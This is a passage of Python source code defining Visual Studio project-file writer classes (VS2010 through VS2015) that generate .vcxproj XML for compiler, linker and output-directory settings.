self.WriteLine('<?xml version="1.0" encoding="Windows-1252"?>')
# pylint: disable=unused-argument
def WriteProjectConfigurations(self, project_configurations):
"""Writes the project configurations.
Args:
project_configurations (VSConfigurations): configurations.
"""
return
def WriteProjectInformation(self, project_information):
"""Writes the project information.
Args:
project_information (VSProjectInformation): project information.
"""
self.WriteLines([
'<VisualStudioProject',
'\tProjectType="Visual C++"',
'\tVersion="9,00"'])
self.WriteLine('\tName="{0:s}"'.format(project_information.name))
self.WriteLine('\tProjectGUID="{{{0:s}}}"'.format(
project_information.guid.upper()))
self.WriteLine(
'\tRootNamespace="{0:s}"'.format(project_information.root_name_space))
if project_information.keyword:
self.WriteLine(
'\tKeyword="{0:s}"'.format(project_information.keyword))
# Also seen 196613.
self.WriteLines([
'\tTargetFrameworkVersion="131072"',
'\t>'])
# TODO: handle platforms.
self.WriteLines([
'\t<Platforms>',
'\t\t<Platform',
'\t\t\tName="Win32"',
'\t\t/>',
'\t</Platforms>'])
self.WriteLines([
'\t<ToolFiles>',
'\t</ToolFiles>'])
class VS2010ProjectFileWriter(VSProjectFileWriter):
"""Visual Studio 2010 project file writer."""
def __init__(self):
"""Initializes a Visual Studio project file writer."""
super(VS2010ProjectFileWriter, self).__init__()
self._project_file_version = '10.0.40219.1'
self._tools_version = '4.0'
self._version = 2010
def _WriteClCompileSection(self, project_configuration):
"""Writes the CLCompile section.
Args:
project_configuration (VSProjectConfiguration): project configuration.
"""
include_directories = ';'.join(project_configuration.include_directories)
include_directories = re.sub(r'"', r'', include_directories)
if include_directories and include_directories[-1] != ';':
include_directories = '{0:s};'.format(
include_directories)
include_directories = '{0:s}%(AdditionalIncludeDirectories)'.format(
include_directories)
preprocessor_definitions = project_configuration.preprocessor_definitions
if preprocessor_definitions and preprocessor_definitions[-1] != ';':
preprocessor_definitions = '{0:s};'.format(preprocessor_definitions)
preprocessor_definitions = '{0:s}%(PreprocessorDefinitions)'.format(
preprocessor_definitions)
self.WriteLine(' <ClCompile>')
if project_configuration.optimization != '':
self.WriteLine(' <Optimization>{0:s}</Optimization>'.format(
project_configuration.optimization_string))
if project_configuration.enable_intrinsic_functions != '':
self.WriteLine((
' <IntrinsicFunctions>{0:s}</IntrinsicFunctions>').format(
project_configuration.enable_intrinsic_functions))
if project_configuration.whole_program_optimization:
self.WriteLine((
' <WholeProgramOptimization>{0:s}'
'</WholeProgramOptimization>').format(
project_configuration.whole_program_optimization_string))
self.WriteLine((
' <AdditionalIncludeDirectories>{0:s}'
'</AdditionalIncludeDirectories>').format(include_directories))
self.WriteLine((
' <PreprocessorDefinitions>{0:s}'
'</PreprocessorDefinitions>').format(preprocessor_definitions))
if project_configuration.basic_runtime_checks != '':
self.WriteLine((
' <BasicRuntimeChecks>{0:s}'
'</BasicRuntimeChecks>').format(
project_configuration.basic_runtime_checks_string))
if project_configuration.smaller_type_check != '':
self.WriteLine((
' <SmallerTypeCheck>{0:s}</SmallerTypeCheck>').format(
project_configuration.smaller_type_check))
self.WriteLine((
' <RuntimeLibrary>{0:s}</RuntimeLibrary>').format(
project_configuration.runtime_librarian_string))
if project_configuration.enable_function_level_linking != '':
self.WriteLine((
' <FunctionLevelLinking>{0:s}</FunctionLevelLinking>').format(
project_configuration.enable_function_level_linking))
if project_configuration.precompiled_header != '':
# A value of 0 is represented by an empty element written over two lines.
if project_configuration.precompiled_header == '0':
self.WriteLines([
' <PrecompiledHeader>',
' </PrecompiledHeader>'])
else:
self.WriteLine((
' <PrecompiledHeader>{0:s}</PrecompiledHeader>').format(
project_configuration.precompiled_header_string))
self.WriteLine(' <WarningLevel>{0:s}</WarningLevel>'.format(
project_configuration.warning_level_string))
if project_configuration.warning_as_error:
self.WriteLine((
' <TreatWarningAsError>{0:s}'
'</TreatWarningAsError>').format(
project_configuration.warning_as_error))
if project_configuration.debug_information_format != '':
# A value of 0 is represented by an empty element written over two lines.
if project_configuration.debug_information_format == '0':
self.WriteLines([
' <DebugInformationFormat>',
' </DebugInformationFormat>'])
else:
self.WriteLine((
' <DebugInformationFormat>{0:s}'
'</DebugInformationFormat>').format(
project_configuration.debug_information_format_string))
if project_configuration.compile_as:
self.WriteLine(' <CompileAs>{0:s}</CompileAs>'.format(
project_configuration.compile_as_string))
self.WriteLine(' </ClCompile>')
def _WriteConfigurationPropertyGroup(self, project_configuration):
"""Writes the configuration property group.
Args:
project_configuration (VSProjectConfiguration): project configuration.
"""
self._WriteConfigurationPropertyGroupHeader(project_configuration)
self.WriteLine(' <ConfigurationType>{0:s}</ConfigurationType>'.format(
project_configuration.output_type_string))
if project_configuration.character_set:
self.WriteLine(' <CharacterSet>{0:s}</CharacterSet>'.format(
project_configuration.character_set_string))
if project_configuration.managed_extensions == '1':
self.WriteLine(' <CLRSupport>true</CLRSupport>')
if project_configuration.whole_program_optimization:
self.WriteLine((
' <WholeProgramOptimization>{0:s}'
'</WholeProgramOptimization>').format(
project_configuration.whole_program_optimization_string))
platform_toolset = project_configuration.GetPlatformToolset(self._version)
if platform_toolset:
self.WriteLine(' <PlatformToolset>{0:s}</PlatformToolset>'.format(
platform_toolset))
self._WriteConfigurationPropertyGroupFooter()
def _WriteConfigurationPropertyGroupFooter(self):
"""Writes the configuration property group footer."""
self.WriteLine(' </PropertyGroup>')
def _WriteConfigurationPropertyGroupHeader(self, project_configuration):
"""Writes the configuration property group header.
Args:
project_configuration (VSProjectConfiguration): project configuration.
"""
self.WriteLine((
' <PropertyGroup Condition="\'$(Configuration)|$(Platform)\'=='
'\'{0:s}|{1:s}\'" Label="Configuration">').format(
project_configuration.name, project_configuration.platform))
def _WriteHeaderFiles(self, header_files):
"""Writes the header files.
Args:
header_files (list[str]): header filenames.
"""
if header_files:
self.WriteLine(' <ItemGroup>')
for filename in header_files:
self.WriteLine(' <ClInclude Include="{0:s}" />'.format(filename))
self.WriteLine(' </ItemGroup>')
def _WriteItemDefinitionGroup(self, project_configuration):
"""Writes the item definition group.
Args:
project_configuration (VSProjectConfiguration): project configuration.
"""
self._WriteItemDefinitionGroupHeader(project_configuration)
# Write the compiler specific section.
self._WriteClCompileSection(project_configuration)
# Write the librarian specific section.
if project_configuration.librarian_output_file:
self._WriteLibrarianSection(project_configuration)
# Write the linker specific section.
if (project_configuration.linker_values_set or
project_configuration.output_type == (
definitions.OUTPUT_TYPE_APPLICATION)):
self._WriteLinkerSection(project_configuration)
self._WriteItemDefinitionGroupFooter()
def _WriteItemDefinitionGroupFooter(self):
"""Writes the item definition group header."""
self.WriteLine(' </ItemDefinitionGroup>')
def _WriteItemDefinitionGroupHeader(self, project_configuration):
"""Writes the item definition group header.
Args:
project_configuration (VSProjectConfiguration): project configuration.
"""
self.WriteLine((
' <ItemDefinitionGroup Condition="\'$(Configuration)|'
'$(Platform)\'==\'{0:s}|{1:s}\'">').format(
project_configuration.name, project_configuration.platform))
def _WriteLibrarianSection(self, project_configuration):
"""Writes the librarian section.
Args:
project_configuration (VSProjectConfiguration): project configuration.
"""
librarian_output_file = re.sub(
r'[$][(]OutDir[)]\\', r'$(OutDir)',
project_configuration.librarian_output_file)
self.WriteLines([
' <Lib>',
' <OutputFile>{0:s}</OutputFile>'.format(librarian_output_file)])
if project_configuration.module_definition_file != '':
self.WriteLine((
' <ModuleDefinitionFile>{0:s}'
'</ModuleDefinitionFile>').format(
project_configuration.module_definition_file))
else:
self.WriteLines([
' <ModuleDefinitionFile>',
' </ModuleDefinitionFile>'])
if project_configuration.librarian_ignore_defaults != '':
self.WriteLine((
' <IgnoreAllDefaultLibraries>{0:s}'
'</IgnoreAllDefaultLibraries>').format(
project_configuration.librarian_ignore_defaults))
self.WriteLine(' </Lib>')
def _WriteLinkerSection(self, project_configuration):
"""Writes the linker section.
Args:
project_configuration (VSProjectConfiguration): project configuration.
"""
self.WriteLine(' <Link>')
# Visual Studio will convert an empty additional dependencies value.
if project_configuration.additional_dependencies:
additional_dependencies = ';'.join(
sorted(project_configuration.additional_dependencies))
additional_dependencies = re.sub(
r'[$][(]OutDir[)]\\', r'$(OutDir)', additional_dependencies)
if additional_dependencies and additional_dependencies[-1] != ';':
additional_dependencies = '{0:s};'.format(additional_dependencies)
additional_dependencies = '{0:s}%(AdditionalDependencies)'.format(
additional_dependencies)
self.WriteLine((
' <AdditionalDependencies>{0:s}'
'</AdditionalDependencies>').format(
additional_dependencies))
if project_configuration.linker_output_file:
linker_output_file = re.sub(
r'[$][(]OutDir[)]\\', r'$(OutDir)',
project_configuration.linker_output_file)
self.WriteLine(' <OutputFile>{0:s}</OutputFile>'.format(
linker_output_file))
if project_configuration.module_definition_file != '':
self.WriteLine((
' <ModuleDefinitionFile>{0:s}'
'</ModuleDefinitionFile>').format(
project_configuration.module_definition_file))
if project_configuration.library_directories:
library_directories = ';'.join(project_configuration.library_directories)
library_directories = re.sub(
r'[$][(]OutDir[)]\\', r'$(OutDir)', library_directories)
library_directories = re.sub(r'"', r'', library_directories)
if library_directories and library_directories[-1] != ';':
library_directories = '{0:s};'.format(library_directories)
library_directories = '{0:s}%(AdditionalLibraryDirectories)'.format(
library_directories)
self.WriteLine((
' <AdditionalLibraryDirectories>{0:s}'
'</AdditionalLibraryDirectories>').format(
library_directories))
if project_configuration.generate_debug_information != '':
self.WriteLine((
' <GenerateDebugInformation>{0:s}'
'</GenerateDebugInformation>').format(
project_configuration.generate_debug_information))
if project_configuration.sub_system != '':
self.WriteLine(' <SubSystem>{0:s}</SubSystem>'.format(
project_configuration.sub_system_string))
if project_configuration.optimize_references == '0':
self.WriteLines([
' <OptimizeReferences>',
' </OptimizeReferences>'])
elif project_configuration.optimize_references != '':
self.WriteLine((
' <OptimizeReferences>{0:s}</OptimizeReferences>').format(
project_configuration.optimize_references_string))
if project_configuration.enable_comdat_folding == '0':
self.WriteLines([
' <EnableCOMDATFolding>',
' </EnableCOMDATFolding>'])
elif project_configuration.enable_comdat_folding != '':
self.WriteLine((
' <EnableCOMDATFolding>{0:s}</EnableCOMDATFolding>').format(
project_configuration.enable_comdat_folding_string))
if project_configuration.randomized_base_address != '':
self.WriteLine((
' <RandomizedBaseAddress>{0:s}'
'</RandomizedBaseAddress>').format(
project_configuration.randomized_base_address_string))
if project_configuration.fixed_base_address == '0':
self.WriteLines([
' <FixedBaseAddress>',
' </FixedBaseAddress>'])
if project_configuration.data_execution_prevention != '':
# A value of 0 is represented by an empty element written over two lines.
if project_configuration.data_execution_prevention == '0':
self.WriteLines([
' <DataExecutionPrevention>',
' </DataExecutionPrevention>'])
else:
self.WriteLine((
' <DataExecutionPrevention>{0:s}'
'</DataExecutionPrevention>').format(
project_configuration.data_execution_prevention_string))
if project_configuration.import_library:
import_library = re.sub(
r'[$][(]OutDir[)]\\', r'$(OutDir)',
project_configuration.import_library)
self.WriteLine(' <ImportLibrary>{0:s}</ImportLibrary>'.format(
import_library))
if project_configuration.target_machine != '':
self.WriteLine(' <TargetMachine>{0:s}</TargetMachine>'.format(
project_configuration.target_machine_string))
self.WriteLine(' </Link>')
def _WriteOutIntDirConditions(
self, configuration_name, project_configurations):
"""Writes the OutDir and IntDir conditions.
Args:
configuration_name (str): name of the configuration.
project_configurations (VSConfigurations): configurations.
"""
for configuration_platform in sorted(project_configurations.platforms):
project_configuration = project_configurations.GetByIdentifier(
configuration_name, configuration_platform)
if len(project_configurations.platforms) == 1:
self.WriteLine((
' <OutDir Condition="\'$(Configuration)|$(Platform)\'=='
'\'{0:s}|{1:s}\'">$(SolutionDir)$(Configuration)\\'
'</OutDir>').format(
project_configuration.name, project_configuration.platform))
else:
self.WriteLine((
' <OutDir Condition="\'$(Configuration)|$(Platform)\'=='
'\'{0:s}|{1:s}\'">$(SolutionDir)$(Configuration)\\$(Platform)\\'
'</OutDir>').format(
project_configuration.name, project_configuration.platform))
for configuration_platform in sorted(project_configurations.platforms):
project_configuration = project_configurations.GetByIdentifier(
configuration_name, configuration_platform)
if len(project_configurations.platforms) == 1:
self.WriteLine((
' <IntDir Condition="\'$(Configuration)|$(Platform)\'=='
'\'{0:s}|{1:s}\'">$(Configuration)\\</IntDir>').format(
project_configuration.name, project_configuration.platform))
else:
self.WriteLine((
' <IntDir Condition="\'$(Configuration)|$(Platform)\'=='
'\'{0:s}|{1:s}\'">$(Configuration)\\$(Platform)\\</IntDir>').format(
project_configuration.name, project_configuration.platform))
def _WriteOutIntDirPropertyGroups(self, project_configurations):
"""Writes the OutDir and IntDir property groups.
Args:
project_configurations (VSConfigurations): configurations.
"""
self.WriteLines([
' <PropertyGroup>',
' <_ProjectFileVersion>{0:s}</_ProjectFileVersion>'.format(
self._project_file_version)])
# Mimic Visual Studio behavior and output the configurations
# in order of name, then platform.
for configuration_name in sorted(project_configurations.names):
self._WriteOutIntDirConditions(configuration_name, project_configurations)
for configuration_platform in sorted(project_configurations.platforms):
project_configuration = project_configurations.GetByIdentifier(
configuration_name, configuration_platform)
if project_configuration.link_incremental != '':
self.WriteLine((
' <LinkIncremental Condition="\'$(Configuration)|'
'$(Platform)\'==\'{0:s}|{1:s}\'">{2:s}</LinkIncremental>').format(
project_configuration.name, project_configuration.platform,
project_configuration.link_incremental_string))
self.WriteLine(' </PropertyGroup>')
def _WriteResourceFiles(self, resource_files):
"""Writes the resource files.
Args:
resource_files (list[str]): resource filenames.
"""
if resource_files:
self.WriteLine(' <ItemGroup>')
for filename in resource_files:
self.WriteLine(' <ResourceCompile Include="{0:s}" />'.format(
filename))
self.WriteLine(' </ItemGroup>')
def _WriteSourceFiles(self, source_files):
"""Writes the source files.
Args:
source_files (list[str]): source filenames.
"""
if source_files:
self.WriteLine(' <ItemGroup>')
for filename in source_files:
self.WriteLine(' <ClCompile Include="{0:s}" />'.format(filename))
self.WriteLine(' </ItemGroup>')
def WriteConfigurations(self, project_configurations):
"""Writes the configurations.
Args:
project_configurations (VSConfigurations): configurations.
"""
self.WriteLine(
' <Import Project="$(VCTargetsPath)\\Microsoft.Cpp.Default.props" />')
# Mimic Visual Studio behavior and output the configurations
# in reverse order of name.
for project_configuration in project_configurations.GetSorted(reverse=True):
self._WriteConfigurationPropertyGroup(project_configuration)
self.WriteLines([
' <Import Project="$(VCTargetsPath)\\Microsoft.Cpp.props" />',
' <ImportGroup Label="ExtensionSettings">',
' </ImportGroup>'])
# Mimic Visual Studio behavior and output the configurations
# in reverse order of name.
for project_configuration in project_configurations.GetSorted(reverse=True):
self.WriteLines([
(' <ImportGroup Condition="\'$(Configuration)|$(Platform)\'=='
'\'{0:s}|{1:s}\'" Label="PropertySheets">'.format(
project_configuration.name, project_configuration.platform)),
(' <Import Project="$(UserRootDir)\\Microsoft.Cpp.$(Platform)'
'.user.props" Condition="exists(\'$(UserRootDir)\\Microsoft.Cpp'
'.$(Platform).user.props\')" Label="LocalAppDataPlatform" />'),
' </ImportGroup>'])
self.WriteLine(' <PropertyGroup Label="UserMacros" />')
self._WriteOutIntDirPropertyGroups(project_configurations)
for project_configuration in project_configurations.GetSorted():
self._WriteItemDefinitionGroup(project_configuration)
def WriteDependencies(self, dependencies, solution_projects_by_guid):
"""Writes the dependencies.
Args:
dependencies (list[str]): GUIDs of the dependencies.
solution_projects_by_guid (dict[str, VSSolutionProject]): projects
per lower case GUID.
"""
if dependencies:
self.WriteLine(' <ItemGroup>')
dependencies_by_name = {}
# Mimic Visual Studio behavior and output the dependencies in order
# of name (perhaps filename?).
for dependency_guid in dependencies:
dependency_project = solution_projects_by_guid[dependency_guid]
dependencies_by_name[dependency_project.name] = dependency_project
for dependency_name in sorted(dependencies_by_name):
dependency_project = dependencies_by_name[dependency_name]
dependency_filename = '..\\{0:s}.vcxproj'.format(
dependency_project.filename)
dependency_guid = dependency_project.guid.lower()
self.WriteLines([
(' <ProjectReference Include="{0:s}">').format(
dependency_filename),
' <Project>{{{0:s}}}</Project>'.format(dependency_guid),
' <ReferenceOutputAssembly>false</ReferenceOutputAssembly>',
' </ProjectReference>'])
self.WriteLine(' </ItemGroup>')
def WriteFiles(self, source_files, header_files, resource_files):
"""Writes the files.
Args:
source_files (list[str]): source filenames.
header_files (list[str]): header filenames.
resource_files (list[str]): resource filenames.
"""
self._WriteSourceFiles(source_files)
self._WriteHeaderFiles(header_files)
self._WriteResourceFiles(resource_files)
def WriteFooter(self):
"""Writes a file footer."""
self.WriteLines([
' <Import Project="$(VCTargetsPath)\\Microsoft.Cpp.targets" />',
' <ImportGroup Label="ExtensionTargets">',
' </ImportGroup>'])
# The last line has no \r\n.
self._file.write(b'</Project>')
def WriteHeader(self):
"""Writes a file header."""
self._file.write(b'\xef\xbb\xbf')
self.WriteLines([
'<?xml version="1.0" encoding="utf-8"?>',
('<Project DefaultTargets="Build" ToolsVersion="{0:s}" '
'xmlns="http://schemas.microsoft.com/developer/msbuild/2003">').format(
self._tools_version)])
def WriteProjectConfigurations(self, project_configurations):
"""Writes the project configurations.
Args:
project_configurations (VSConfigurations): configurations.
"""
self.WriteLine(' <ItemGroup Label="ProjectConfigurations">')
for project_configuration in project_configurations.GetSorted():
self.WriteLine(' <ProjectConfiguration Include="{0:s}|{1:s}">'.format(
project_configuration.name, project_configuration.platform))
self.WriteLine(' <Configuration>{0:s}</Configuration>'.format(
project_configuration.name))
self.WriteLine(' <Platform>{0:s}</Platform>'.format(
project_configuration.platform))
self.WriteLine(' </ProjectConfiguration>')
self.WriteLine(' </ItemGroup>')
def WriteProjectInformation(self, project_information):
"""Writes the project information.
Args:
project_information (VSProjectInformation): project information.
"""
self.WriteLine(' <PropertyGroup Label="Globals">')
self.WriteLine(' <ProjectGuid>{{{0:s}}}</ProjectGuid>'.format(
project_information.guid))
self.WriteLine(' <RootNamespace>{0:s}</RootNamespace>'.format(
project_information.root_name_space))
if project_information.keyword:
self.WriteLine(' <Keyword>{0:s}</Keyword>'.format(
project_information.keyword))
self.WriteLine(' </PropertyGroup>')
class VS2012ProjectFileWriter(VS2010ProjectFileWriter):
"""Visual Studio 2012 project file writer."""
def __init__(self):
"""Initializes a Visual Studio project file writer."""
super(VS2012ProjectFileWriter, self).__init__()
self._project_file_version = '11.0.61030.0'
self._tools_version = '4.0'
self._version = 2012
def _WriteClCompileSection(self, project_configuration):
"""Writes the CLCompile section.
Args:
project_configuration (VSProjectConfiguration): project configuration.
"""
include_directories = ';'.join(project_configuration.include_directories)
include_directories = re.sub(r'"', r'', include_directories)
if include_directories and include_directories[-1] != ';':
include_directories = '{0:s};'.format(
include_directories)
include_directories = '{0:s}%(AdditionalIncludeDirectories)'.format(
include_directories)
preprocessor_definitions = project_configuration.preprocessor_definitions
if preprocessor_definitions and preprocessor_definitions[-1] != ';':
preprocessor_definitions = '{0:s};'.format(preprocessor_definitions)
preprocessor_definitions = '{0:s}%(PreprocessorDefinitions)'.format(
preprocessor_definitions)
self.WriteLine(' <ClCompile>')
if project_configuration.optimization != '':
self.WriteLine(' <Optimization>{0:s}</Optimization>'.format(
project_configuration.optimization_string))
if project_configuration.enable_intrinsic_functions != '':
self.WriteLine((
' <IntrinsicFunctions>{0:s}</IntrinsicFunctions>').format(
project_configuration.enable_intrinsic_functions))
self.WriteLine((
' <AdditionalIncludeDirectories>{0:s}'
'</AdditionalIncludeDirectories>').format(include_directories))
self.WriteLine((
' <PreprocessorDefinitions>{0:s}'
'</PreprocessorDefinitions>').format(preprocessor_definitions))
if project_configuration.basic_runtime_checks != '':
self.WriteLine((
' <BasicRuntimeChecks>{0:s}'
'</BasicRuntimeChecks>').format(
project_configuration.basic_runtime_checks_string))
if project_configuration.smaller_type_check != '':
self.WriteLine((
' <SmallerTypeCheck>{0:s}</SmallerTypeCheck>').format(
project_configuration.smaller_type_check))
self.WriteLine((
' <RuntimeLibrary>{0:s}</RuntimeLibrary>').format(
project_configuration.runtime_librarian_string))
if project_configuration.enable_function_level_linking != '':
self.WriteLine((
' <FunctionLevelLinking>{0:s}</FunctionLevelLinking>').format(
project_configuration.enable_function_level_linking))
if project_configuration.precompiled_header != '':
# A value of 0 is represented by an empty XML tag.
if project_configuration.precompiled_header == '0':
self.WriteLine(' <PrecompiledHeader />')
else:
self.WriteLine((
' <PrecompiledHeader>{0:s}</PrecompiledHeader>').format(
project_configuration.precompiled_header_string))
self.WriteLine(' <WarningLevel>{0:s}</WarningLevel>'.format(
project_configuration.warning_level_string))
if project_configuration.warning_as_error:
self.WriteLine((
' <TreatWarningAsError>{0:s}'
'</TreatWarningAsError>').format(
project_configuration.warning_as_error))
if project_configuration.debug_information_format != '':
# A value of 0 is represented by an empty XML tag.
if project_configuration.debug_information_format == '0':
self.WriteLine(' <DebugInformationFormat />')
else:
self.WriteLine((
' <DebugInformationFormat>{0:s}'
'</DebugInformationFormat>').format(
project_configuration.debug_information_format_string))
if project_configuration.compile_as:
self.WriteLine(' <CompileAs>{0:s}</CompileAs>'.format(
project_configuration.compile_as_string))
self.WriteLine(' </ClCompile>')
def _WriteConfigurationPropertyGroup(self, project_configuration):
"""Writes the configuration property group.
Args:
project_configuration (VSProjectConfiguration): project configuration.
"""
self._WriteConfigurationPropertyGroupHeader(project_configuration)
self.WriteLine(' <ConfigurationType>{0:s}</ConfigurationType>'.format(
project_configuration.output_type_string))
platform_toolset = project_configuration.GetPlatformToolset(self._version)
if platform_toolset:
self.WriteLine(' <PlatformToolset>{0:s}</PlatformToolset>'.format(
platform_toolset))
if project_configuration.character_set:
self.WriteLine(' <CharacterSet>{0:s}</CharacterSet>'.format(
project_configuration.character_set_string))
if project_configuration.managed_extensions == '1':
self.WriteLine(' <CLRSupport>true</CLRSupport>')
if project_configuration.whole_program_optimization:
self.WriteLine((
' <WholeProgramOptimization>{0:s}'
'</WholeProgramOptimization>').format(
project_configuration.whole_program_optimization_string))
self._WriteConfigurationPropertyGroupFooter()
def _WriteItemDefinitionGroup(self, project_configuration):
"""Writes the item definition group.
Args:
project_configuration (VSProjectConfiguration): project configuration.
"""
self._WriteItemDefinitionGroupHeader(project_configuration)
# Write the compiler specific section.
self._WriteClCompileSection(project_configuration)
# Write the librarian specific section.
if project_configuration.librarian_output_file:
self._WriteLibrarianSection(project_configuration)
# Write the linker specific section.
if (project_configuration.linker_values_set or
project_configuration.output_type == (
definitions.OUTPUT_TYPE_APPLICATION)):
self._WriteLinkerSection(project_configuration)
self._WriteItemDefinitionGroupFooter()
def _WriteLibrarianSection(self, project_configuration):
"""Writes the librarian section.
Args:
project_configuration (VSProjectConfiguration): project configuration.
"""
librarian_output_file = re.sub(
r'[$][(]OutDir[)]\\', r'$(OutDir)',
project_configuration.librarian_output_file)
self.WriteLines([
' <Lib>',
' <OutputFile>{0:s}</OutputFile>'.format(librarian_output_file)])
if project_configuration.module_definition_file != '':
self.WriteLine((
' <ModuleDefinitionFile>{0:s}'
'</ModuleDefinitionFile>').format(
project_configuration.module_definition_file))
else:
self.WriteLine(' <ModuleDefinitionFile />')
if project_configuration.librarian_ignore_defaults != '':
self.WriteLine((
' <IgnoreAllDefaultLibraries>{0:s}'
'</IgnoreAllDefaultLibraries>').format(
project_configuration.librarian_ignore_defaults))
self.WriteLine(' </Lib>')
def _WriteLinkerSection(self, project_configuration):
"""Writes the linker section.
Args:
project_configuration (VSProjectConfiguration): project configuration.
"""
self.WriteLine(' <Link>')
# Visual Studio will convert an empty additional dependencies value.
if project_configuration.additional_dependencies:
additional_dependencies = ';'.join(
sorted(project_configuration.additional_dependencies))
additional_dependencies = re.sub(
r'[$][(]OutDir[)]\\', r'$(OutDir)', additional_dependencies)
if additional_dependencies and additional_dependencies[-1] != ';':
additional_dependencies = '{0:s};'.format(additional_dependencies)
additional_dependencies = (
'{0:s}%(AdditionalDependencies)').format(
additional_dependencies)
self.WriteLine((
' <AdditionalDependencies>{0:s}'
'</AdditionalDependencies>').format(
additional_dependencies))
if project_configuration.linker_output_file:
linker_output_file = re.sub(
r'[$][(]OutDir[)]\\', r'$(OutDir)',
project_configuration.linker_output_file)
self.WriteLine(' <OutputFile>{0:s}</OutputFile>'.format(
linker_output_file))
if project_configuration.module_definition_file != '':
self.WriteLine((
' <ModuleDefinitionFile>{0:s}'
'</ModuleDefinitionFile>').format(
project_configuration.module_definition_file))
if project_configuration.library_directories:
library_directories = ';'.join(project_configuration.library_directories)
library_directories = re.sub(
r'[$][(]OutDir[)]\\', r'$(OutDir)', library_directories)
library_directories = re.sub(r'"', r'', library_directories)
if library_directories and library_directories[-1] != ';':
library_directories = '{0:s};'.format(library_directories)
library_directories = (
'{0:s}%(AdditionalLibraryDirectories)').format(
library_directories)
self.WriteLine((
' <AdditionalLibraryDirectories>{0:s}'
'</AdditionalLibraryDirectories>').format(
library_directories))
if project_configuration.generate_debug_information != '':
self.WriteLine((
' <GenerateDebugInformation>{0:s}'
'</GenerateDebugInformation>').format(
project_configuration.generate_debug_information))
if project_configuration.sub_system != '':
self.WriteLine(' <SubSystem>{0:s}</SubSystem>'.format(
project_configuration.sub_system_string))
if project_configuration.optimize_references == '0':
self.WriteLine(' <OptimizeReferences />')
elif project_configuration.optimize_references != '':
self.WriteLine((
' <OptimizeReferences>{0:s}</OptimizeReferences>').format(
project_configuration.optimize_references_string))
if project_configuration.enable_comdat_folding == '0':
self.WriteLine(' <EnableCOMDATFolding />')
elif project_configuration.enable_comdat_folding != '':
self.WriteLine((
' <EnableCOMDATFolding>{0:s}</EnableCOMDATFolding>').format(
project_configuration.enable_comdat_folding_string))
if project_configuration.randomized_base_address != '':
self.WriteLine((
' <RandomizedBaseAddress>{0:s}'
'</RandomizedBaseAddress>').format(
project_configuration.randomized_base_address_string))
if project_configuration.fixed_base_address == '0':
# A value of 0 is represented by an empty XML tag.
self.WriteLine(' <FixedBaseAddress />')
if project_configuration.data_execution_prevention != '':
# A value of 0 is represented by an empty XML tag.
if project_configuration.data_execution_prevention == '0':
self.WriteLine(' <DataExecutionPrevention />')
else:
self.WriteLine((
' <DataExecutionPrevention>{0:s}'
'</DataExecutionPrevention>').format(
project_configuration.data_execution_prevention_string))
if (project_configuration.target_machine != '' and
project_configuration.linker_values_set):
self.WriteLine(' <TargetMachine>{0:s}</TargetMachine>'.format(
project_configuration.target_machine_string))
if project_configuration.import_library:
import_library = re.sub(
r'[$][(]OutDir[)]\\', r'$(OutDir)',
project_configuration.import_library)
self.WriteLine(' <ImportLibrary>{0:s}</ImportLibrary>'.format(
import_library))
self.WriteLine(' </Link>')
def _WriteOutIntDirConditions(
self, configuration_name, project_configurations):
"""Writes the OutDir and IntDir conditions.
Args:
configuration_name (str): name of the configuration.
project_configurations (VSConfigurations): configurations.
"""
for configuration_platform in sorted(project_configurations.platforms):
project_configuration = project_configurations.GetByIdentifier(
configuration_name, configuration_platform)
if len(project_configurations.platforms) == 1:
self.WriteLines([
(' <PropertyGroup Condition="\'$(Configuration)|$(Platform)\'=='
'\'{0:s}|{1:s}\'">').format(
project_configuration.name, project_configuration.platform),
' <OutDir>$(SolutionDir)$(Configuration)\\</OutDir>',
' <IntDir>$(Configuration)\\</IntDir>'])
else:
self.WriteLines([
(' <PropertyGroup Condition="\'$(Configuration)|$(Platform)\'=='
'\'{0:s}|{1:s}\'">').format(
project_configuration.name, project_configuration.platform),
(' <OutDir>$(SolutionDir)$(Configuration)\\$(Platform)\\'
'</OutDir>'),
' <IntDir>$(Configuration)\\$(Platform)\\</IntDir>'])
if project_configuration.linker_values_set:
self.WriteLine(' <LinkIncremental>false</LinkIncremental>')
self.WriteLine(' </PropertyGroup>')
def _WriteOutIntDirPropertyGroups(self, project_configurations):
"""Writes the OutDir and IntDir property groups.
Args:
project_configurations (VSConfigurations): configurations.
"""
self.WriteLines([
' <PropertyGroup>',
' <_ProjectFileVersion>{0:s}</_ProjectFileVersion>'.format(
self._project_file_version),
' </PropertyGroup>'])
# Mimic Visual Studio behavior and output the configurations
# in order of name, then platform.
for configuration_name in sorted(project_configurations.names):
self._WriteOutIntDirConditions(configuration_name, project_configurations)
# for configuration_platform in sorted(project_configurations.platforms):
# project_configuration = project_configurations.GetByIdentifier(
# configuration_name, configuration_platform)
# if project_configuration.link_incremental != '':
# self.WriteLine((
# ' <LinkIncremental Condition="\'$(Configuration)|'
# '$(Platform)\'==\'{0:s}|{1:s}\'">{2:s}'
# '</LinkIncremental>').format(
# project_configuration.name, project_configuration.platform,
# project_configuration.link_incremental_string))
class VS2013ProjectFileWriter(VS2010ProjectFileWriter):
"""Visual Studio 2013 project file writer."""
def __init__(self):
"""Initializes a Visual Studio project file writer."""
super(VS2013ProjectFileWriter, self).__init__()
self._project_file_version = '12.0.21005.1'
self._tools_version = '12.0'
self._version = 2013
class VS2015ProjectFileWriter(VS2012ProjectFileWriter):
"""Visual Studio 2015 project file writer."""
def __init__(self):
"""Initializes a Visual Studio project file writer."""
super(VS2015ProjectFileWriter, self).__init__()
self._project_file_version = '14.0.25431.1'
self._tools_version = '14.0'
self._version = 2015
def _WriteOutIntDirConditions(
self, configuration_name, project_configurations):
"""Writes the OutDir and IntDir conditions.
Args:
configuration_name (str): name of the configuration.
project_configurations (VSConfigurations): configurations.
"""
for configuration_platform in sorted(project_configurations.platforms):
project_configuration = project_configurations.GetByIdentifier(
configuration_name, configuration_platform)
if len(project_configurations.platforms) == 1:
self.WriteLines([
(' <PropertyGroup Condition="\'$(Configuration)|$(Platform)\'=='
'\'{0:s}|{1:s}\'">').format(
project_configuration.name, project_configuration.platform),
' <OutDir>$(SolutionDir)$(Configuration)\\</OutDir>',
' <IntDir>$(Configuration)\\</IntDir>'])
else:
self.WriteLines([
(' <PropertyGroup Condition="\'$(Configuration)|$(Platform)\'=='
'\'{0:s}|{1:s}\'">').format(
project_configuration.name, project_configuration.platform),
(' <OutDir>$(SolutionDir)$(Configuration)\\$(Platform)\\'
'</OutDir>'),
' <IntDir>$(Configuration)\\$(Platform)\\</IntDir>'])
self.WriteLine(' </PropertyGroup>')
